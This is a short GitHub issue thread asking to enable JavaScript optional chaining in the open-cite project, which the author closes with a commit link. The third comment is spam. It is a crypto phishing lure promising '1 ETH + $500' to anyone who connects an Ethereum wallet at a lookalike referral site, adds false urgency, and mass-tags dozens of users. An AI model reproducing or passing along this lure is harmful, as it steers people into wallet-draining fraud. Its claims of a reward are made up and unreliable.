### ISSUE TITLE
Enable JS optional chaining

### ISSUE THREAD

**Issue by arisgk** [arisgk/open-cite#1]
The objective is to enable this JS syntax https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Optional_chaining as it results in much more readable code.

Probably transpiling the project with Babel is the solution to this.

**Comment by arisgk** [comment]
Fixed by https://github.com/arisgk/open-cite/commit/42fa2ff73365677d6c3543a503797bf8a67ad247

**Comment by creer** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
channprj, @linjianfeng3581, @deluser8, @mattonik, @ianuoui, @blissini, @synthetix-tom, @luisofribeiro, @git-hemant, @yarwelp, @sersarov, @cGitHub123, @ruyan768, @iFloris, @MuhtasimTanmoy, @hackedubuntu, @saqib-nadeem, @ABRAHAMEKIO, @yuxiaoqing22, @lgs, @willgri83, @claudio-viola, @jakelacey2012, @Akayeshmantha, @ntheile, @digitalnomad91, @d3v3l0, @atyenoria, @williamcotton, @y0unghe, @eigenein, @acodingnomad, @peterbrinck, @mipo915, @victorquinn, @wellington1993, @sandalsoft, @rahalio, @drunaar, @gvvynplaine, @igorsyl, @kevinsegal, @skeledrew, @aschrijver, @jonchoi, @ericNunnDev, @the17706, @ptigas, @thesubr00t, @LiefBodhi
